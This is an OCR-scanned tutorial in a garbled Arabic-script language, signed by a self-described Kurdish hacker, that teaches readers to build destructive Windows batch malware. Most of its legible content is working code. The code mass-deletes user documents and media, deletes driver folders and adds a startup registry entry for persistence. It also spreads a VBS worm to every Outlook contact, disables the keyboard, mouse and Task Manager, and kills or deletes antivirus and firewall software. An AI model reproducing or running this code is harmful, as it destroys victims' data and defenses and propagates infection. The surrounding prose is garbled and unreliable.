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OJ LS |jq all I Oo^ JQ fC LSjJr fölLuiJ I 



oîl 3 )jq cûjI ciQDjq .oiuk: .oUjujJI 



V 

<^j| jl dljoljlj j jl^LLj^ Al j ^\ joi 

Aj <_£öjjA£ (^^Sbjjj^LSLuu^ jUi^Aj (_£tjjJ jjjl j4j jLû jj-<AA 
j^.*Ujj<L5Luiij J<1 A_ij ^jÎAjjj (JjjjJjj£ ^^^jAL-û Ajjj ö J jjjj 6 jji. 
j jUjU ^AjI^Jj Aj ^aSAj j>j jjjU ^jj£ Ui^jjJ A] U IJöjjI 
b JJ ^^jl^Ajjj^ jA^jjj ^ jljj-oAA (JöjAj jj ûJLuj 

^ J 2 CsW^U ^ cs^J* ^“Jjj ^ O'W 

aAj LLuJjj /'uû <JjI£Aj <-ûlj Aj <J dluiJ ûJJ AjUl^j J oAj 

C1jI£L <_^Aj4uûIjjAj ^jA Aj CjjuJjjj ^A^Aj ^uuAj 4^ (Jö j ji> 

AjAJb I j^jj )Aj o LLû aS q quAA qlj U /'A^AjJjul) ql jjj q qusAJb 

■ ■ ■ ■ ♦♦ **V V.*.* V VV V w ♦♦ **v ♦♦♦♦ vv 
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^U Jjj£ j4uu4j jo Jj ojiujjj Aj ^4jjj£ ^4 j j>« 

UUAfc (j-jjjli ^Jj^ UiuijjJ Aj jULIjajLi Ai 4u»jju<jjj ûj<U jj t$j4j 
jAbji ^4 j 4jjj o-jjjjli jdjLjoJ 0j4jjjJAj ^SbjjjS £jA flj4l jjl£AjJjj£ Ajb 4j jj> 

ûj4j4£jj 4J 4£ j)4£4J jlS oj4mijJ ^jl£4jUj4i jASJj 4J ^4£4j ^uib <jj jûjja. ^4j 
. j)J04j ^Ui4j 4 £ûj4j jjj j£ j4jj 4J jl£ jjjj4jk jjj| jj4j 



uhjj^ 

jt£ 4 j UfljJû jjj jjjL j jl£ jj J 4jii4j jbj ^jSbLli ojbJ j4jojb4j j »_Sûjj4A OASJ^ 

..LAjU 

jj Jj£4j Uiui jjJ i_5ojji 4£ Jj4ji jb <_£juA£ j4jV4j 4£ 4jûjb42 ^4£ ^JULli <jj jjjli 

^jJ^jjU ^SUluAAo 

LjjjjjA4j jI£4j jjjU ^blSbjSbj jjJji cH'j^ Ji ^ j4j jjj 

j4ju o4j£ oj4Sbui jjjli j4lbj4j ^^SbbjU LSUjjAj ^UûjjjI^j 4j4jVjj jjo. j <_Sojj 4A 
Uuio j jj4j ^yjjjS Uiui jjj 4J <_^JU \ j jLo jj jjljjj 



U4 j jU 4 j { jjlljjjb} SECURITY (jjLLSbi jj ^4£ ^^b&U oj 

4 j jjj4J ^jjlSo Jj4jjl£ j4_ui oJj£ jbUjjA i_Soj 4 SLSLa Aj4_^ b4jo jbs ^4J jjjLl^U jbsjjj4A 
jb£lA jo j4jl_jl£o j4jjjj j£ 4j4Sb jjj4£ jbj) jj jjI jSJLuijjJ Ljjjj£_ui lib 4j 4£ u£Uui jjjli 



bbj4A Ji Jj£ UiuijjJ jUIjj Jjj£ (^Sbj4SL£U jjj 4A 4Iujjjj oujjii 'bjJ 

4j 4A jbj42b ^V4 j jjj|J 4jU4j j4uu4j <-Sbj4jb 4jj jbj4AU jLajl£ûj4SLSU ûj4a!j4j ^V4j 
^ y£4j4jb j jbluij4jj4_ui ^yjjjSLSU j4uAi j4£ J ijjj4J <_jj jj j4j_u4j j42û J ^ « ^£4j jjJji 

Cfi J*JJ* 
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t Z i UUM jji <_>U j Jjli j jû. 

jjj cf^JjJ^ <L ^ Ljj Jj^^ jj (jûiAAj jlSAj Jbjjj AjuÎ 

JjAa 1$J4j jjj V * (jAiöjbAl jAjjjjjjS ‘tSoja. jjj4j (j-jjjli qUAIjAU ^Uu AJ 

jjj lSJujAS 

d j4J ^jjojö j4J AS ) JjISöjAjj^ jS jU Aj JjS j4J4^Aj ^jj jjjIû jlSULuûAA ^jIS^JLuj 4j ^V4 j 
jjjJjS Cj^jjJ j jAjjjjjjjS j Ji AS JjS ^j^jjJ AuAS 

UjA4J jI£Aj jj jjlS Jj (jbjAjjjxajS (jjj^Ai (qSUAU. jojAj jAj4J 

jjjJjSMj UujjjJ Ajljli ojja. j4j jj (j jAjjjjji jS jAj 

jjj uSjj^j (^5U*j jjjli .UAa 4_*U jjjj 

j jOli. ^jjjU (jjHA^. Ibl^jş. jU Aj ûjjj jjL UnjjAjlU jl jAA jjJ ^Uj 4j ^VAj 

(jUjjL jIjSAj UmjjJ oj'Ujjl (jJjj^A (jAjV 4j (jiij|j*U Ai (jjjjlnjjJ jja. jljja. 

IAjISAjjLuj jU Aj d jdJj£4J 

AS \ jlS ö jj^ j4J jJj^jj^Jj 4j LiuAfe L^-jj4ua4J j5L^ jjjAjIS j4J 

d jAjjj j^j ljj]Aj4J j ljjj^j ) JjISMoj jjjIS jjjAA j4ujjAj uLmjdJ ^j) jjj4J Aj 

AJLnjjjU j 4J (jJj£ jJUj jj öjAjjjj jjL (j-jjjU Jj4j (jjjj^A Ajjj 

j»AS4j jljUa. ^jjjli (jjjjA^. (jjjj^UnjjJ 4j (jab ûjöjlji. JûjjJ .UAa jAj qUU UuÛj 

(yjjaiUi 4j ^jjj jUujjj jAj (jjtûjAJA£4_4 ^U JjjS j <jUji jAjjAJ AjISU AjISU 

SjUjUojAjjjj^jS 



Îöjjj^jöj jJjjS ^AjûjUjA-uj jjA_a. 4J ^Jjjjjj 
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^4J (jûj4Jjj£ Jj c.c.jUjj J j (jijj4J (JJj4J Cuj c_£4j Aj jLoluijjjj UöjA-ui 

^ (> jAjjjl^JAA 



Start>AII Programs>Accessories>Notepad 

;<Luijjjj jljA^ ySjJiui Ai jb 

Notepad 

ûjûjMJo jûj J AJLulJjU f4J jj Jjj jb 

Start>AII Programs>Accessories>Run 

I^LuiJjjj jöj Aj jLuib 



Notepad 

^Jh 



/ Untitled - Notepad 


| <=. || (H ']^3m\ 


File Edit Format View Help 






? I AA&j jLuj qj 4J 4-aIj LU i/j-ui >jj 4-î4JI $4j ULuuj 

■ * <*♦* «* ♦* ♦♦ ■«✓♦*♦ ♦* ♦* 

^IuuAj jLjj jl jU 4J 4 jjA ^j j4Jo ^jj£ 4Jb iJS j4j l5j£Aj d jUb J£ & jöj) 4J 

Ajö j>LSL lt 5 CP^i. û**4 

Ctrl+S *-i (jk ^öJ •Jjj^S j^jAI jL File>Save jj^ 




dûjllj j*Lui jLaAiajlS I jAi duAioj AjAJfc Aj jA&U aSJj£ jLoJjjj ^4J jLuL 




All Files »JjjjAA jLajja. ^Aj.I 

ÛJJJ ûjAa jj A5L uSLIS .3 — ^LL .bat jj^-ûL iJjLjS Al jMuujjL uSJjU.2 
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J f&û (jjiU Huûj 

! 4 _m£ ^AJ ^JliiA jl£ 4 j i_il ji <U ^jj jLiuijjjAj jj o j*L#jL*U sjLjjJ 



@echo off 



7 4j Cûl4j i 



S 



i AS LjjjA£UjûJ öJj£ j4J d jAjjA Aj A£ (jjjjjjtû ^jJj^j-uj jjJ jj öJj£ (jjjjjSûj4-uj öJj£ ^4j 
Ajjj-aj JJ jji^JJJjAJ 



C:\Windows\System32\> 



cls 



AS4-uujJ j4ujjLui jû jAjjj-uj jj ljjJjLSAj dJ jS a4J 



color Oa 



jj^LJ jj 4£4jJuUjJJ jjSsJÖJ ^JJjjS j (JJÛJ jj AS4 ujLj ^jIjûj ^j jS ljjJjISAj ûJjS f4j 



color Oc 



JJJUU jj ASAjaajjjI J ^^JJjjS J (JJÛJ jj AS4 ujLj ^^Soû J ^JJjjS CjjJjISAj ûJjS 



color 05 



jjj» jj A£ 4 Jjjjjjj ^^Soû j ^yjjj^ j (JJÖJ jj AS4 jZLZi ^Soû j ^jjS CjjJjISAj ûJjS 



color 09 



jj ^SAjjuujjj (^dj ^JJjjS j (JJÛJ jj AS4A Lj (^JJjjS ljjJjISAj ûJj£ 
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Cd\ 



(jjjui (Jj^AA IjJ AjIj s ^jIuijJj Jj CûJjISAj 



( Echo Off > Nul ) & Break Off )))@ 

Set HiveBSOD=HKLM\Software\Microsoft\Windows\CurrentVersion\Run@ 

Reg Add "%HiveBSOD%" /v "BSOD" /t "REG_SZ" /d %0 /f > Nul@ 

"*.*\Del /q /s /f "%SystemRoot%\Windows\System32\Drivers@ 

( 

BSOD cPj - ® L u <5 *LuiLui 4£ûj4j jjjj ^AujjLui ^jJj^jjui Jj ljj J jIS Aj c û jAjA^ £jLAa*U 



DIR/S/B %SystemDrive%\*.doc » FlleList_doc.txt 
"echo Y | FOR /F "tokens=l,* delims=: " %%j in (FlleList_doc.txt) do del "%%j:%%k 
doc 4j|j jj jjj jjja. ‘'J AS jAj^Ui j4j j.jjAA jojAjjj*j Jj CjjJjISAj 



DIR /S/B %SystemDrive%\*.xml » FlleList_xml.txt 
"echo Y | FOR/F "tokens=l,* delims=: " %%j in (FlleList_xml.txt) do del "%%j:%%k 

xml jjS-uiU AS jAûUi jAj jjjiAA jsjAjjjuu Jj CuJjLSAj 



DIR /S/B %SystemDrive%\*.png » FlleList_png.txt 
"echo Y | FOR /F "tokens=l,* delims=: " %%j in (FlleList_png.txt) do del "%%j:%%k 

png jjSuj L AjIj jLSAjjj AS jAjiLli jAj jjj»AA jsjAjj >j Jj CjjJjLSAj 



DIR /S/B %SystemDrive%\*.txt » FlleList_txt.txt 
"echo Y | FOR /F "tokens=l,* delims=: " %%j in (FlleList_txt.txt) do del "%%j:%%k 

tXt <J jS-uiLj AjIj sjAjjjSAj jLjjj jj Aj AS jAj^ULS jAj jjjiAA jSjAjjjui jj CjjJjLSAj 
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DIR /S/B %SystemDrive%\*.mp3 » FlleList_mp3.txt 
"echo Y | FOR /F "tokens=l,* delims=: " %%j in (FlleList_mp3.txt) do del "%%j:%%k 
mp3 ^jSujU ‘'j'j jliAjjljjS j'U jj^ jijQjui Jj 



DIR /S/B %SystemDrive%\*.exe » FlleList_exe.txt 
"echo Y | FOR /F "tokens=l,* delims=: " %%j in (FlleList_exe.txt) do del "%%j:%%k 
exe (JjSjjIj AjIj ( jlS4_aljj4_i AJjIJ jjjAA jaj^jjju Jj CjjJjUAj 



DIR /S/B %System D ri ve%\* . pdf » FlleList_pdf.txt 
"echo Y | FOR/F "tokens=l,* delims=: " %%j in (FlleList_pdf.txt) do del "%%j:%%k 

pdf j j^-uiL AjIj (jlSAjjjS Ajjli jAj jjjjAA jajAjjjjj jj CjjJjLSAj 



DIR /S/B %System D ri ve%\* . m p4 » FlleList_mp4.txt 
"echo Y | FOR /F "tokens=l,* delims=: " %%j in (FlleList_mp4.txt) do del "%%j:%%k 

mp4 (jjS_ JuU AjIj jjLS iJjJjî i_SJJjAA ALIi jAJ jjuAA (jsjAjj >ui Jj CjjJjLSAj 



DIR /S/B %SystemDrive%\*.lnk » FlleList_lnk.txt 
"echo Y | FOR/F "tokens=l,* delims=: " %%j in (FlleList_lnk.txt) do del "%%j:%%k 

Ink J jSuuiLj AjIj (jLSAjjLui ^^Sjjj Ajjlî jAj jjjAA jsjAjjjuu Jj JjjJjLSAj 



’*.*\del /f /q '%userprofile%\My Documents 



LjjlaJSJJ Jjsjjja jlj (^jLSAjjli jjjAA jo jAJjjui Jj JjjJjLSAj 



'*.*\del /f /q '%userprofile%\My Music 



uSj jjjM (jj» jj JS jU (jjLSALIi jjjiAA (jo jAjjjui Jj CjjJjLSAj 
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'*.*\del /f /q '%userprofile%\My Pictures 



(jlSAJjj jjûAÎ jS jU jjjAA jûj^Ujjo jj CjjJjISAj 



echo dim x»%SystemDrive%\mail.vbs 
echo on error resume next»%SystemDrive%\mail.vbs 
echo Set fso ="Scripting.FileSystem.Object"»%SystemDrive%\mail.vbs 
echo Set so=CreateObject(fso)»%SystemDrive%\mail.vbs 
echo Set ol=CreateObject("Outlook.Application")»%SystemDrive%\mail.vbs 
echo Set out=WScript.CreateObject("Outlook.Application")»%SystemDrive%\mail.vbs 
echo Set mapi = out.GetNameSpace("MAPI")»%SystemDrive%\mail.vbs 
echo Set a = mapi.AddressLists(l)»%SystemDrive%\mail.vbs 
echo Set ae=a.AddressEntries»%SystemDrive%\mail.vbs 
echo For x=l To ae.Count»%SystemDrive%\mail.vbs 
echo Set ci=ol.Createltem(0)»%SystemDrive%\mail.vbs 
echo Set Mail=ci»%SystemDrive%\mail.vbs 

echo Mail.to=ol.GetNameSpace("MAPI").AddressLists(l).AddressEntries(x)»%SystemDrive%\mail.vbs 
echo Mail.Subject="lmportant"»%SystemDrive%\mail.vbs 
echo Mail.Body="VisiT Kurdish Websites!-RENWA-"»%SystemDrive%\mail.vbs 
echo Mail.Attachments.Add(%0)»%SystemDrive%\mail.vbs 
echo Mail.send»%SystemDrive%\mail.vbs 
echo Next»%SystemDrive%\mail.vbs 
echo ol.Quit»%SystemDrive%\mail.vbs 
"start "" "%SystemDrive%\mail.vbs 



I^&JjAj j±la jS jj-ûAA jU Aj A£ l£ jI j jU jA-ûUjAj AJ ^jAjV A£ ^UAJjAjuj jj-ûAA jj l^ULA-ûjj ^jJjU jj ljjJjISAj 
jAio (j\l£ AjJjjS AjjLj ^JUj^Luj ljLAj |j4U4JjAjuj AJ AjAA 
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if exist winstart.vbs goto next 

echo set objShell = CreateObject{"WScript.Shell") » winstart.vbs 
echo objShell.Run ".bat", vbHide, TRUE » winstart.vbs 
"start "" "winstart.vbs 
exit 
next: 

(jjjjjla ^Lli j ojAjJjUi jj jjjJjlSAj 

"set key="HKEY_LOCAL_MACHINE\system\CurrentControlSet\Services\Mouclass 

%reg delete %key 

reg add %key% /v Start /t REG_DWORD /d 4 

(jMj Lj ^jluLjlS jj cjjjjlSAj 

"echo Windows Registry Editor Version 5.00 > "nokeyboard.reg 
"echo [HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Keyboard Layout] » "nokeyboard.reg 
"echo "Scancode Map"=hex:00,00,00,00,00,00,00,00,7c,00,00,00,00,00,01,00,00,\ » "nokeyboard.reg 
"echo 00,3b,00,00,00,3c,00,00,00,3d,00,00,00,3e,00,00,00,3f,00,00,00,40,00,00,00,\ » "nokeyboard.reg 
"echo 41,00,00,00,42,00,00,00,43,00,00,00,44,00,00,00,57,00,00,00,58,00,00,00,37,\ » "nokeyboard.reg 
"echo e0,00,00,46,00,00,00,45,00,00,00,35,e0,00,00,37,00,00,00,4a,00,00,00,47,00,\ » "nokeyboard.reg 
"echo 00,00,48,00,00,00,49,00,00,00,4b,00,00,00,4c,00,00,00,4d,00,00,00,4e,00,00,\ » "nokeyboard.reg 
"echo 00,4f,00,00,00,50,00,00,00,51,00,00,00,lc,e0,00,00,53,00,00,00,52,00,00,00,\ » "nokeyboard.reg 
"echo 4d,e0,00,00,50,e0,00,00,4b,e0,00,00,48,e0,00,00,52,e0,00,00,47,e0,00,00,49,\ » "nokeyboard.reg 
"echo e0,00,00,53,e0,00,00,4f,e0,00,00,51,e0,00,00,29,00,00,00,02,00,00,00,03,00,\ » "nokeyboard.reg 
"echo 00,00,04,00,00,00,05,00,00,00,06,00,00,00,07,00,00,00,08,00,00,00,09,00,00,\ » "nokeyboard.reg 
"echo 00,0a,00,00,00,0b,00,00,00,0c,00,00,00,0d,00,00,00,0e,00,00,00,0f,00,00,00,\ » "nokeyboard.reg 
"echo 10,00,00,00, 1 1,00,00,00, 12,00,00,00, 13,00,00,00, 14,00,00,00, 15,00,00,00, 16,\ » "nokeyboard.reg 
"echo 00,00,00, 17,00,00,00, 18,00,00,00, 19,00,00,00, la,00,00,00, lb,00,00,00,2b,00,\ » "nokeyboard.reg 
"echo 00,00,3a,00,00,00,le,00,00,00,lf,00,00,00,20,00,00,00,21,00,00,00,22,00,00,\ » "nokeyboard.reg 
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"echo 00,23,00,00,00,24,00,00,00,25,00,00,00,26,00,00,00,27,00,00,00,28,00,00,00,\ » "nokeyboard.reg 
"echo lc,00,00,00,2a,00,00,00,2c,00,00,00,2d,00,00,00,2e,00,00,00,2f,00,00,00,30,\ » "nokeyboard.reg 
"echo 00,00,00,31,00,00,00,32,00,00,00,33,00,00,00,34,00,00,00,35,00,00,00,36,00,\ » "nokeyboard.reg 
"echo 00,00,ld,00,00,00,5b,e0,00,00,38,00,00,00,39,00,00,00,38,e0,00,00,5c,e0,00,\ » "nokeyboard.reg 
"echo 00,5d,e0,00,00,ld,e0,00,00,5f,e0,00,00,5e,e0,00,00,22,e0,00,00,24,e0,00,00,\ » "nokeyboard.reg 
"echo 10,e0,00,00,19,e0,00,00,30,e0,00,00,2e,e0,00,00,2c,e0,00,00,20,e0,00,00,6a,\ » "nokeyboard.reg 
"echo e0,00,00,69,e0,00,00,68,e0,00,00,67,e0,00,00,42,e0,00,00,6c,e0,00,00,6d,e0,\ » "nokeyboard.reg 
"echo 00,00,66,e0,00,00,6b,e0,00,00,21,e0,00,00,00,00 » "nokeyboard.reg 
ii 

start "nokeyboard.reg 

JS AJ jj 



reg add 

HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System /v 

DisableTaskMgr /t REG_SZ /d 1 /f >nul 



JS Jj CûJjLSAj 



Echo off & @@Break Off@ 

Ipconfig /release 

jUmP%E%nD%c%onFiG%h%ldE%o%P% h%aRv%%aRd%A%T%%cHe%cK%HappY%3D % 

! ? ! b%aLLoONs%Y%eS% m3Ga 

%P%ReSs%%IE%AuS%ExPloR%e%r% > nul.%TemplnternetRelease 

CjjjjAjjjj jj ■ ma jt < Aj Jj CjjJjLSAj 



"net stop "WinDefend 
"taskkill /f /t /im "MSASCui.exe 



jJjjjj ^jjjjS-uj jj < ma jt < Aj Jj CjjJjLSAj 
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"net stop "wuauserv 



£ui±>4J jJjjjj JS Jj CûJjISAj 



"net stop "security center 
net stop sharedaccess 
netsh firewall set opmode mode-disable 

jjjjjJ jAj>Lui 4j Jj CjjJjISAj 



”net stop "Security Center 
netsh firewall set opmode mode=disable 
*tskill /A av 
*tskill /A fire 
*tskill /A anti 
cls 

*tskill /A spy 
tskill /A bullguard 
tskill /A PersFw 
*tskill /A KAV 
tskill /A ZONEALARM 
tskill /A SAFEWEB 
cls 

tskill /A OUTPOST 
*tskill /A nv 
*tskill /A nav 
*-tskill /A F 
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tskill /A ESAFE 
tskill /A cle 
cls 

tskill /A BLACKICE 
*tskill /A def 
tskill /A kav 
*tskill /A kav 
*tskill /A avg 
*tskill /A ash 
cls 

tskill /A aswupdsv 
*tskill /A ewid 
*tskill /Aguard 
*tskill /Aguar 
*tskill /AgcasDt 
*tskill /A msmp 
cls 

*tskill /A mcafe 
tskill /A mghtml 
tskill /A msiexec 
tskill /A outpost 
tskill /A isafe 
*tskill /A zap 
cls 

tskill /A zauinst 
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*tskill /A virus 
*tskill /A realm 
cls 

*tskill /A sweep 
*tskill /A scan 
*-tskill /A ad 
*tskill /A safe 
*tskill /A avas 
*tskill /A norm 
cls 

*tskill /A offg 

*.*\del /Q/F C:\Program Files\alwils~l\avast4 
del /Q/F C:\Program Files\Lavasoft\Ad-awa~l\*.exe 
del /Q/F C:\Program Files\kasper~l\*.exe 
cls 

del /Q/F C:\Program Files\trojan~l\*.exe 
del /Q/F C:\Program Files\f-prot95\*.dll 
del /Q/F C:\Program Files\tbav\*.dat 
cls 

del /Q /F C:\Program Files\avpersonal\*.vdf 
del /Q/F C:\Program Files\Norton~l\*.cnt 
*.*\del /Q/F C:\Program Files\Mcafee 
cls 

*.*\del /Q/F C:\Program Files\Norton~l\Norton~l\Norton~3 
*.*\del /Q/F C:\Program Files\Norton~l\Norton~l\speedd~l 
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*.*\del /Q/F C:\Program Files\Norton~l\Norton~l 
*.*\del /Q/F C:\Program Files\Norton~l 
cls 

del /Q/F C:\Program Files\avgamsr\*.exe 
del /Q/F C:\Program Files\avgamsvr\*.exe 
del /Q/F C:\Program Files\avgemc\*.exe 
cls 

del /Q/F C:\Program Files\avgcc\*.exe 
del /Q/F C:\Program Files\avgupsvc\*.exe 
del /Q/F C:\Program Files\grisoft 
del /Q/F C:\Program Files\nood32krn\*.exe 
del /Q/F C:\Program Files\nood32\*.exe 
cls 

del /Q/F C:\Program Files\nod32 
del /Q/F C:\Program Files\nood32 
del /Q/F C:\Program Files\kav\*.exe 
del /Q/F C:\Program Files\kavmm\*.exe 
*.*\del /Q/F C:\Program Files\kaspersky 
cls 

del /Q/F C:\Program Files\ewidoctrl\*.exe 
del /Q/F C:\Program Files\guard\*.exe 
del /Q/F C:\Program Files\ewido\*.exe 
cls 

del /Q/F C:\Program Files\pavprsrv\*.exe 
del /Q/F C:\Program Files\pavprot\*.exe 
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del /Q/F C:\Program Files\avengine\*.exe 
cls 

del /Q/F C:\Program Files\apvxdwin\*.exe 
del /Q/F C:\Program Files\webproxy\*.exe 
*.*\del /Q/F C:\Program Files\panda software 



^Ûjjj£jjji jj jjJjLSAj jAjLiUjAj jAj j jjAA jj - "A jl < <U Jj UUJ jISAj 



”net stop "Security Center 
netsh firewall set opmode mode=disable 
*tskill /A av 
*tskill /A fire 
*tskill /A anti 
cls 

*tskill /A spy 
tskill /A bullguard 
tskill /A PersFw 
*tskill /A KAV 
tskill /A ZONEALARM 
tskill /A SAFEWEB 
cls 

tskill /A OUTPOST 
*tskill /A nv 
*tskill /A nav 
*-tskill /A F 
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tskill /A ESAFE 
tskill /A cle 
cls 

tskill /A BLACKICE 
*tskill /A def 
tskill /A kav 
*tskill /A kav 
*tskill /A avg 
*tskill /A ash 
cls 

tskill /A aswupdsv 
*tskill /A ewid 
*tskill /Aguard 
*tskill /Aguar 
*tskill /AgcasDt 
*tskill /A msmp 
cls 

*tskill /A mcafe 
tskill /A mghtml 
tskill /A msiexec 
tskill /A outpost 
tskill /A isafe 
*tskill /A zap 
cls 

tskill /A zauinst 
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20 





*tskill /A virus 
*tskill /A realm 
cls 

*tskill /A sweep 
*tskill /A scan 
*-tskill /A ad 
*tskill /A safe 
*tskill /A avas 
*tskill /A norm 
cls 

*tskill /A offg 



jluj jLjii jj (jjJjlSAj (jAJLaUjAj jjjAA js jAjjjju Aj jj ûjjJjlSAj 



echo :a »explorer.bat 
echo tskill explorer »explorer.bat 
echo goto a »explorer.bat 

echo Set objShell = CreateObject("WScript.SheN")»invisi.vbs 
echo strCommand = "explorer.bat"»invisi.vbs 
echo objShell.Run strCommand, vbHide, TRUE»invisi.vbs 
start "" invisi.vbs 

jAj ijjjjjS (jsjAjjj) jjS JAa ASU jjjjjj jj t ■■ A jl < jj jj cjjJjlSAj 



tskill iexplore 

jsjjjjjj&ji UûjjAjjjj **■■ "At < jj cjjJjlSAj 
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I>ijj Jj 4£jlj|jJ j jU ^yjjjjS Jj CjjJjlU-l 
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"del /f /q "mspaint.exe 



lLlLAj jj ljjJjISAj 



"del /f /q "notepad.exe 



Jljjj jj JÛjA-Lj-uJ jj ljjJjI£Aj 



"del /f /q "WordPad.exe 



JljJjj jû jAjjjlj jj CjjJjISAj 



"del /f /q "calc.exe 



4 n^il % 4 jI j jIaj j jû jAjjjlj jj CjjJjISAj 



"cd "C:\Windows\System32\Drivers\etc 
"echo 127.0.0.1 youtube.com » "Hosts 
"echo 127.0.0.1 www.youtube.com » "Hosts 
i_i ijjjjj Jji - ■■ JjjS i-S jL Jj CjjJjISAj 



"cd "C:\Windows\System32\Drivers\etc 
"echo 127.0.0.1 google.com » "Hosts 
"echo 127.0.0.1 www.google.com » "Hosts 

Jijjl ^jjjlui Ji JjS I_S jL jj jjjj jISAj 
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"cd "C:\Windows\System32\Drivers\etc 
"echo 127.0.0.1 facebook.com » "Hosts 
"echo 127.0.0.1 www.facebook.com » "Hosts 

<_Sjjj*jj 4£ ^jjjS i_S jL jj CjjJjISAj 



"cd "C:\Windows\System32\Drivers\etc 
"echo 127.0.0.1 yahoo.com » "Hosts 
"echo 127.0.0.1 www.yahoo.com » "Hosts 

jjAU ^jjjLui ^JjS i_S ,jL jj CjjJjISAj 



shutdown -s -t 9 -c Good Bye - RENWA 



4£jjk H 4j j4j jjjj jS j»j4jjj| jjS jj CjjJjLSAj 



start http://www.facebook.com/ 



facebook (jLUu jU «Uja. jj uûjjIS4j 



reg add "HKCU\Software\Microsoft\lnternet Explorer\Main" /v "START PAGE" /d 

""http://www.renwa.net 

renwa.net jw fj* 4j|j ,jjjLj ^yLjj^ jj uûjjIS4j 



echo Do»msgbox.vbs 

echo x=msgbox("You Have Been Hacked By RENWA - Kurdish HAckErS.",vbExclamation or 

vbOkOnly/'Hacked") »msgbox.vbs 

echo Loop»msgbox.vbs 

"start msgbox.vbs 

"start msgbox.vbs 
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"start "" 


"msgbox.vbs 


"start "" 


"msgbox.vbs 


"start "" 


"msgbox.vbs 


"start "" 


"msgbox.vbs 


"start "" 


"msgbox.vbs 


"start "" 


"msgbox.vbs 


"start "" 


"msgbox.vbs 


"start "" 


"msgbox.vbs 


"start "" 


"msgbox.vbs 


"start "" 


"msgbox.vbs 


"start "" 


"msgbox.vbs 


"start "" 


"msgbox.vbs 


"start "" 


"msgbox.vbs 


"start "" 


"msgbox.vbs 


"start "" 


"msgbox.vbs 


"start "" 


"msgbox.vbs 


"start "" 


"msgbox.vbs 


"start "" 


"msgbox.vbs 


"start "" 


"msgbox.vbs 


"start "" 


"msgbox.vbs 


"start "" 


"msgbox.vbs 


"start "" 


"msgbox.vbs 


"start "" 


"msgbox.vbs 


"start "" 


"msgbox.vbs 


"start "" 


"msgbox.vbs 



gj*j4_a 4 j ^jLASo jjaöj ^jjj£ Cilui jj CûJjLSAj 
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j£ lSjjşj jj ljjJjLSAj 



attrib +s +h %0 
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jjj 4Jj<U jA A jlu 

jAA Aj jöjöJ jjA Aj jJjjjjjj jljb jjj 

4jj34iuulj jj4_u jjj jjU ^ j4_a i_£Aj 4j ^jj4j sjöj4Jj jjjb 4Jj UjJ4a iJLjjjjJj j4Jfc 4J 

(Ijjjj) 4jjjjjj 

i_Sjjj jj-oj4i 4J ^öJLaU I j4J j4£jjj ^j-uj iji UiuiftJ (jlluijj jU jjj 4A jUS4j4 uu£ j4A j4^4j 

jLiöj4j|j ljIja jj 

https://www.facebook.com/kurdddddddddddddddd 

liijjjjjj 4j UUjJjS ^S4j4J4A j4A j4^4j jJjjjjjj jljlJ 



jUS4jV jjj 4A jj <_Hj£ 



14-9-2013 9:08 



ENWA 

urDisH 
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